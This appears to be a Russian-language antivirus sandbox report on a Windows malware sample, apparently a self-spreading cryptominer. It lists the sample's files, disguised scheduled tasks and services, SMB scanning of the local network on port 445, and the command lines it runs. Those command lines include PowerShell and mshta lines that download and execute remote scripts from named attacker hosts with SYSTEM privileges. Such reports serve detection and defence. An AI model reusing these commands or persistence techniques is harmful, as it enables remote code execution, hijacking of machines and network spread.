Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\microsoft\windows\.net framework\.net framework cache optimization
- <SYSTEM32>\tasks\microsoft\windows\bluetooth\updatedevicetask
- <SYSTEM32>\tasks\microsoft\windows\shell\windowsshellupdate
- <SYSTEM32>\tasks\microsoft\windows\shell\winshell
- <SYSTEM32>\tasks\microsoft\windows\upnp\upnphost
- <SYSTEM32>\tasks\microsoft\windows\upnp\upnpclient task
- <SYSTEM32>\tasks\microsoft\windows\edp\edp app lock task
- <SYSTEM32>\tasks\microsoft\windows\edp\edp app update cache
- <SYSTEM32>\tasks\microsoft\windows\registry\regbackup
- <SYSTEM32>\tasks\microsoft\windows\mobilepc\detectpc
- <SYSTEM32>\tasks\microsoft\windows\.net framework\.net framework cache optimization files-s-3-5-21-2236678155-433529325-2142214968-1138
- <SYSTEM32>\tasks\microsoft\windows\.net framework\.net framework cache optimization files-s-3-5-21-2236678156-433529325-2142214268-1138
- <SYSTEM32>\tasks\microsoft\windows\mui\lpupdate
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\cli_optimization_v2.0.55727_64] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cli_optimization_v2.0.55727_64] 'ImagePath' = 'cmd /c mshta http://asq.r77vh0.pw/win/checking.hta'
- [<HKLM>\System\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '<SYSTEM32>\WinRing0x64.sys'
- [<HKLM>\System\CurrentControlSet\Services\cli_optimization_v2.0.55727_32] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cli_optimization_v2.0.55727_32] 'ImagePath' = 'cmd /c mshta https://qlqd5zqefmkcr34a.onion.pet/win/checking.hta'
Вредоносные функции
Загружает и запускает на исполнение
- http://19#.#23.234.33/win/checking.ps1
Изменения в файловой системе
Создает следующие файлы
- %PROGRAMDATA%\oracle\java\java.exe
- %TEMP%\csc5baa.tmp
- %TEMP%\uwocssvk.out
- %TEMP%\uwocssvk.cmdline
- %TEMP%\uwocssvk.0.cs
- %TEMP%\apqng2dt.dll
- %TEMP%\res58fb.tmp
- %TEMP%\csc58fa.tmp
- %TEMP%\apqng2dt.out
- %TEMP%\apqng2dt.cmdline
- %TEMP%\apqng2dt.0.cs
- %TEMP%\bpotsuwq.dll
- %TEMP%\res565b.tmp
- %TEMP%\csc565a.tmp
- %TEMP%\bpotsuwq.out
- %TEMP%\bpotsuwq.cmdline
- %TEMP%\bpotsuwq.0.cs
- %WINDIR%\fonts\del.ps1
- %WINDIR%\fonts\sasd.bat
- %WINDIR%\syswow64\winring0x64.sys
- %TEMP%\res5bab.tmp
- %TEMP%\uwocssvk.dll
Удаляет следующие файлы
- %TEMP%\res565b.tmp
- %TEMP%\uwocssvk.cmdline
- %TEMP%\uwocssvk.0.cs
- %TEMP%\csc5baa.tmp
- %TEMP%\res5bab.tmp
- %TEMP%\apqng2dt.out
- %TEMP%\apqng2dt.cmdline
- %TEMP%\apqng2dt.0.cs
- %TEMP%\apqng2dt.pdb
- %TEMP%\apqng2dt.dll
- %TEMP%\csc58fa.tmp
- %TEMP%\res58fb.tmp
- %TEMP%\bpotsuwq.out
- %TEMP%\bpotsuwq.cmdline
- %TEMP%\bpotsuwq.dll
- %TEMP%\bpotsuwq.pdb
- %TEMP%\bpotsuwq.0.cs
- %TEMP%\csc565a.tmp
- %TEMP%\uwocssvk.out
- %TEMP%\uwocssvk.dll
Сетевая активность
Подключается к
- '<LOCALNET>.16.1':445
- '<LOCALNET>.16.163':445
- '<LOCALNET>.16.164':445
- '<LOCALNET>.16.165':445
- '<LOCALNET>.16.166':445
- '<LOCALNET>.16.167':445
- '<LOCALNET>.16.168':445
- '<LOCALNET>.16.169':445
- '<LOCALNET>.16.170':445
- '<LOCALNET>.16.171':445
- '<LOCALNET>.16.172':445
- '<LOCALNET>.16.173':445
- '<LOCALNET>.16.174':445
- '<LOCALNET>.16.144':445
- '<LOCALNET>.16.175':445
- '<LOCALNET>.16.177':445
- '<LOCALNET>.16.178':445
- '<LOCALNET>.16.179':445
- '<LOCALNET>.16.180':445
- '<LOCALNET>.16.181':445
- '<LOCALNET>.16.182':445
- '<LOCALNET>.16.183':445
- '<LOCALNET>.16.184':445
- '<LOCALNET>.16.185':445
- '<LOCALNET>.16.186':445
- '<LOCALNET>.16.187':445
- '<LOCALNET>.16.188':445
- '<LOCALNET>.16.161':445
- '<LOCALNET>.16.162':445
- '<LOCALNET>.16.160':445
- '<LOCALNET>.16.159':445
- '<LOCALNET>.16.158':445
- '<LOCALNET>.16.131':445
- '<LOCALNET>.16.132':445
- '<LOCALNET>.16.133':445
- '<LOCALNET>.16.134':445
- '<LOCALNET>.16.135':445
- '<LOCALNET>.16.136':445
- '<LOCALNET>.16.137':445
- '<LOCALNET>.16.138':445
- '<LOCALNET>.16.139':445
- '<LOCALNET>.16.140':445
- '<LOCALNET>.16.141':445
- '<LOCALNET>.16.142':445
- '<LOCALNET>.16.189':445
- '<LOCALNET>.16.176':445
- '<LOCALNET>.16.143':445
- '<LOCALNET>.16.146':445
- '<LOCALNET>.16.147':445
- '<LOCALNET>.16.148':445
- '<LOCALNET>.16.149':445
- '<LOCALNET>.16.150':445
- '<LOCALNET>.16.151':445
- '<LOCALNET>.16.152':445
- '<LOCALNET>.16.153':445
- '<LOCALNET>.16.154':445
- '<LOCALNET>.16.155':445
- '<LOCALNET>.16.156':445
- '<LOCALNET>.16.157':445
- '<LOCALNET>.16.130':445
- '<LOCALNET>.16.145':445
- '<LOCALNET>.16.190':445
- '<LOCALNET>.16.191':445
- '<LOCALNET>.16.192':445
- '<LOCALNET>.16.225':445
- '<LOCALNET>.16.226':445
- '<LOCALNET>.16.227':445
- '<LOCALNET>.16.228':445
- '<LOCALNET>.16.229':445
- '<LOCALNET>.16.230':445
- '<LOCALNET>.16.231':445
- '<LOCALNET>.16.232':445
- '<LOCALNET>.16.233':445
- '<LOCALNET>.16.234':445
- '<LOCALNET>.16.235':445
- '<LOCALNET>.16.236':445
- '<LOCALNET>.16.237':445
- '<LOCALNET>.16.239':445
- '<LOCALNET>.16.129':445
- '<LOCALNET>.16.240':445
- '<LOCALNET>.16.241':445
- '<LOCALNET>.16.242':445
- '<LOCALNET>.16.243':445
- '<LOCALNET>.16.244':445
- '<LOCALNET>.16.245':445
- '<LOCALNET>.16.246':445
- '<LOCALNET>.16.247':445
- '<LOCALNET>.16.248':445
- '<LOCALNET>.16.249':445
- '<LOCALNET>.16.250':445
- '<LOCALNET>.16.251':445
- '<LOCALNET>.16.252':445
- '<LOCALNET>.16.224':445
- '<LOCALNET>.16.207':445
- '<LOCALNET>.16.223':445
- '<LOCALNET>.16.206':445
- '<LOCALNET>.16.193':445
- '<LOCALNET>.16.194':445
- '<LOCALNET>.16.195':445
- '<LOCALNET>.16.196':445
- '<LOCALNET>.16.197':445
- '<LOCALNET>.16.198':445
- '<LOCALNET>.16.199':445
- '<LOCALNET>.16.200':445
- '<LOCALNET>.16.201':445
- '<LOCALNET>.16.202':445
- '<LOCALNET>.16.203':445
- '<LOCALNET>.16.204':445
- '<LOCALNET>.16.205':445
- '<LOCALNET>.16.253':445
- '<LOCALNET>.16.221':445
- '<LOCALNET>.16.208':445
- '<LOCALNET>.16.209':445
- '<LOCALNET>.16.210':445
- '<LOCALNET>.16.211':445
- '<LOCALNET>.16.212':445
- '<LOCALNET>.16.213':445
- '<LOCALNET>.16.214':445
- '<LOCALNET>.16.215':445
- '<LOCALNET>.16.216':445
- '<LOCALNET>.16.217':445
- '<LOCALNET>.16.218':445
- '<LOCALNET>.16.219':445
- '<LOCALNET>.16.220':445
- '<LOCALNET>.16.222':445
- '<LOCALNET>.16.238':445
- '<LOCALNET>.16.128':445
- '<LOCALNET>.16.111':445
- '<LOCALNET>.16.36':445
- '<LOCALNET>.16.37':445
- '<LOCALNET>.16.38':445
- '<LOCALNET>.16.39':445
- '<LOCALNET>.16.40':445
- '<LOCALNET>.16.41':445
- '<LOCALNET>.16.42':445
- '<LOCALNET>.16.43':445
- '<LOCALNET>.16.44':445
- '<LOCALNET>.16.45':445
- '<LOCALNET>.16.46':445
- '<LOCALNET>.16.47':445
- '<LOCALNET>.16.16':445
- '<LOCALNET>.16.48':445
- '<LOCALNET>.16.50':445
- '<LOCALNET>.16.51':445
- '<LOCALNET>.16.52':445
- '<LOCALNET>.16.53':445
- '<LOCALNET>.16.54':445
- '<LOCALNET>.16.55':445
- '<LOCALNET>.16.56':445
- '<LOCALNET>.16.57':445
- '<LOCALNET>.16.58':445
- '<LOCALNET>.16.59':445
- '<LOCALNET>.16.60':445
- '<LOCALNET>.16.61':445
- '<LOCALNET>.16.33':445
- '<LOCALNET>.16.35':445
- '<LOCALNET>.16.32':445
- '<LOCALNET>.16.31':445
- '<LOCALNET>.16.30':445
- '<LOCALNET>.16.3':445
- '<LOCALNET>.16.4':445
- '<LOCALNET>.16.5':445
- '<LOCALNET>.16.6':445
- '<LOCALNET>.16.7':445
- '<LOCALNET>.16.8':445
- '<LOCALNET>.16.9':445
- '<LOCALNET>.16.10':445
- '<LOCALNET>.16.11':445
- '<LOCALNET>.16.12':445
- '<LOCALNET>.16.13':445
- '<LOCALNET>.16.14':445
- '<LOCALNET>.16.62':445
- '<LOCALNET>.16.49':445
- '<LOCALNET>.16.15':445
- '<LOCALNET>.16.18':445
- '<LOCALNET>.16.19':445
- '<LOCALNET>.16.20':445
- '<LOCALNET>.16.21':445
- '<LOCALNET>.16.22':445
- '<LOCALNET>.16.23':445
- '<LOCALNET>.16.24':445
- '<LOCALNET>.16.25':445
- '<LOCALNET>.16.26':445
- '<LOCALNET>.16.27':445
- '<LOCALNET>.16.28':445
- '<LOCALNET>.16.29':445
- '<LOCALNET>.16.2':445
- '<LOCALNET>.16.17':445
- '<LOCALNET>.16.63':445
- '<LOCALNET>.16.64':445
- '<LOCALNET>.16.65':445
- '<LOCALNET>.16.98':445
- '<LOCALNET>.16.99':445
- '<LOCALNET>.16.100':445
- '<LOCALNET>.16.101':445
- '<LOCALNET>.16.102':445
- '<LOCALNET>.16.103':445
- '<LOCALNET>.16.104':445
- '<LOCALNET>.16.105':445
- '<LOCALNET>.16.106':445
- '<LOCALNET>.16.107':445
- '<LOCALNET>.16.108':445
- '<LOCALNET>.16.109':445
- '<LOCALNET>.16.110':445
- '<LOCALNET>.16.112':445
- '<LOCALNET>.16.127':445
- '<LOCALNET>.16.113':445
- '<LOCALNET>.16.114':445
- '<LOCALNET>.16.115':445
- '<LOCALNET>.16.116':445
- '<LOCALNET>.16.117':445
- '<LOCALNET>.16.118':445
- '<LOCALNET>.16.119':445
- '<LOCALNET>.16.120':445
- '<LOCALNET>.16.121':445
- '<LOCALNET>.16.122':445
- '<LOCALNET>.16.123':445
- '<LOCALNET>.16.124':445
- '<LOCALNET>.16.125':445
- '<LOCALNET>.16.97':445
- '<LOCALNET>.16.80':445
- '<LOCALNET>.16.96':445
- '<LOCALNET>.16.79':445
- '<LOCALNET>.16.66':445
- '<LOCALNET>.16.67':445
- '<LOCALNET>.16.68':445
- '<LOCALNET>.16.69':445
- '<LOCALNET>.16.70':445
- '<LOCALNET>.16.71':445
- '<LOCALNET>.16.72':445
- '<LOCALNET>.16.73':445
- '<LOCALNET>.16.74':445
- '<LOCALNET>.16.75':445
- '<LOCALNET>.16.76':445
- '<LOCALNET>.16.77':445
- '<LOCALNET>.16.78':445
- '<LOCALNET>.16.126':445
- '<LOCALNET>.16.94':445
- '<LOCALNET>.16.81':445
- '<LOCALNET>.16.82':445
- '<LOCALNET>.16.83':445
- '<LOCALNET>.16.84':445
- '<LOCALNET>.16.85':445
- '<LOCALNET>.16.86':445
- '<LOCALNET>.16.87':445
- '<LOCALNET>.16.88':445
- '<LOCALNET>.16.89':445
- '<LOCALNET>.16.90':445
- '<LOCALNET>.16.91':445
- '<LOCALNET>.16.92':445
- '<LOCALNET>.16.93':445
- '<LOCALNET>.16.95':445
- '<LOCALNET>.16.254':445
TCP
Запросы HTTP GET
- http://19#.#23.234.33/win/checking.ps1
- http://19#.#23.234.33/win/sasd.bat
- http://19#.#23.234.33/win/del.ps1
- http://19#.#23.234.33/win/val/ichigo2.bin
UDP
- DNS ASK eu.##nerpool.pw
- DNS ASK ra#.####ubusercontent.com
Другое
Создает и запускает на исполнение
- '%PROGRAMDATA%\oracle\java\java.exe'
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('http://19#.#23.234.33/win/checking.ps1'))' (со скрытым окном)
- '%PROGRAMDATA%\oracle\java\java.exe' ' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bpotsuwq.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES565B.tmp" "%TEMP%\CSC565A.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\apqng2dt.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES58FB.tmp" "%TEMP%\CSC58FA.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\uwocssvk.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5BAB.tmp" "%TEMP%\CSC5BAA.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('http://19#.#23.234.33/win/checking.ps1'))
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn "\Microsoft\Windows\EDP\EDP App Lock Task" /sc hourly /f /mo 22 /tr "<SYSTEM32>\cmd.exe /c mshta http://as#.#77vh0.pw/win/checking.hta" /ru SYSTEM
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "\Microsoft\Windows\EDP\EDP App Lock Task" /sc hourly /f /mo 22 /tr "<SYSTEM32>\cmd.exe /c mshta http://as#.#77vh0.pw/win/checking.hta" /ru SYSTEM
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn "\Microsoft\Windows\EDP\EDP App Update Cache" /sc hourly /f /mo 23 /tr "<SYSTEM32>\cmd.exe /c mshta https://asq.r77vh0.pw/win/hssl/r7.hta" /ru SYSTEM
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "\Microsoft\Windows\EDP\EDP App Update Cache" /sc hourly /f /mo 23 /tr "<SYSTEM32>\cmd.exe /c mshta https://asq.r77vh0.pw/win/hssl/r7.hta" /ru SYSTEM
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\Registry\RegBackup /sc MINUTE /f /mo 10 /tr "<SYSTEM32>\cmd.exe /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run" /ru "NT AUTHORITY\...
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\Registry\RegBackup /sc MINUTE /f /mo 10 /tr "<SYSTEM32>\cmd.exe /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run" /ru "NT AUTHORITY\SYSTEM" /RL ...
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run
- '%WINDIR%\syswow64\schtasks.exe' /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\MobilePC\DetectPC /sc MINUTE /f /mo 10 /tr "<SYSTEM32>\cmd.exe /c %WINDIR%\Fonts\sasd.bat" /ru "NT AUTHORITY\SYSTEM"
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn "\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138" /sc HOURLY /f /mo 17 /tr "cmd /c powershell -no...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\uwocssvk.cmdline"
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138" /sc HOURLY /f /mo 17 /tr "cmd /c powershell -nop -noni -w 1...
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn "\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678156-433529325-2142214268-1138" /sc DAILY /f /mo 5 /tr "cmd /c powershell -nop ...
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678156-433529325-2142214268-1138" /sc DAILY /f /mo 5 /tr "cmd /c powershell -nop -noni -w 1 -...
- '%WINDIR%\syswow64\schtasks.exe' /f /tn \Microsoft\Windows\MUI\LPupdate /tr "<SYSTEM32>\cmd.exe /c powershell -exec bypass %WINDIR%\Fonts\del.ps1" /ru SYSTEM /sc HOURLY /mo 4 /create
- '%WINDIR%\syswow64\hostname.exe'
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bpotsuwq.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES565B.tmp" "%TEMP%\CSC565A.tmp"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\apqng2dt.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES58FB.tmp" "%TEMP%\CSC58FA.tmp"
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "\Microsoft\Windows\UPnP\UPnPClient Task" /sc DAILY /f /mo 4 /tr "<SYSTEM32>\cmd.exe /c mshta https://asq.d6shiiwz.pw/win/hssl/d6.hta" /ru SYSTEM /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\MobilePC\DetectPC /sc MINUTE /f /mo 10 /tr "<SYSTEM32>\cmd.exe /c %WINDIR%\Fonts\sasd.bat" /ru "NT AUTHORITY\SYSTEM"
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn "\Microsoft\Windows\UPnP\UPnPClient Task" /sc DAILY /f /mo 4 /tr "<SYSTEM32>\cmd.exe /c mshta https://asq.d6shiiwz.pw/win/hssl/d6.hta" /ru SYSTEM /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /tn \Microsoft\Windows\MobilePC\DetectPC /delete /f
- '%WINDIR%\syswow64\cmd.exe' /c sc delete cli_optimization_v2.0.55727_64
- '%WINDIR%\syswow64\sc.exe' delete cli_optimization_v2.0.55727_64
- '%WINDIR%\syswow64\cmd.exe' /c sc delete cli_optimization_v2.0.55727_32
- '%WINDIR%\syswow64\sc.exe' delete cli_optimization_v2.0.55727_32
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn "\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization" /sc HOURLY /f /mo 16 /tr "cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALw...
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization" /sc HOURLY /f /mo 16 /tr "cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpAD...
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /tn \Microsoft\Windows\MobilePC\DetectPC /end
- '%WINDIR%\syswow64\schtasks.exe' /tn \Microsoft\Windows\MobilePC\DetectPC /end
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /tn \Microsoft\Windows\MobilePC\DetectPC /delete /f
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /tn \Microsoft\Windows\Registry\RegBackup /delete /f
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\UPnP\UPnPHost /sc DAILY /f /mo 2 /tr "<SYSTEM32>\cmd.exe /c mshta http://ql######fmkcr34a.onion.pet/win/checking.hta" /ru SYSTEM /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /tn \Microsoft\Windows\Registry\RegBackup /delete /f
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /end
- '%WINDIR%\syswow64\schtasks.exe' /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /end
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /TN \Microsoft\Windows\Bluetooth\UpdateDeviceTask /TR %PROGRAMDATA%\Oracle\Java\java.exe /ST 00:00 /SC once /DU 59994 /RI 1 /F /RL HIGHEST /RU SYSTEM
- '%WINDIR%\syswow64\schtasks.exe' /create /TN \Microsoft\Windows\Bluetooth\UpdateDeviceTask /TR %PROGRAMDATA%\Oracle\Java\java.exe /ST 00:00 /SC once /DU 59994 /RI 1 /F /RL HIGHEST /RU SYSTEM
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\Shell\WindowsShellUpdate /sc HOURLY /f /mo 6 /tr "<SYSTEM32>\cmd.exe /c mshta http://19#.#23.234.33/win/update.hta" /ru "NT AUTHORITY\SYSTEM" /RL HIGH...
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\Shell\WindowsShellUpdate /sc HOURLY /f /mo 6 /tr "<SYSTEM32>\cmd.exe /c mshta http://19#.#23.234.33/win/update.hta" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\Shell\WinShell /sc DAILY /f /mo 1 /tr "<SYSTEM32>\cmd.exe /c mshta http://19#.#23.234.33/win/checking.hta" /ru SYSTEM /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\Shell\WinShell /sc DAILY /f /mo 1 /tr "<SYSTEM32>\cmd.exe /c mshta http://19#.#23.234.33/win/checking.hta" /ru SYSTEM /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\UPnP\UPnPHost /sc DAILY /f /mo 2 /tr "<SYSTEM32>\cmd.exe /c mshta http://ql######fmkcr34a.onion.pet/win/checking.hta" /ru SYSTEM /RL HIGHEST
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5BAB.tmp" "%TEMP%\CSC5BAA.tmp"
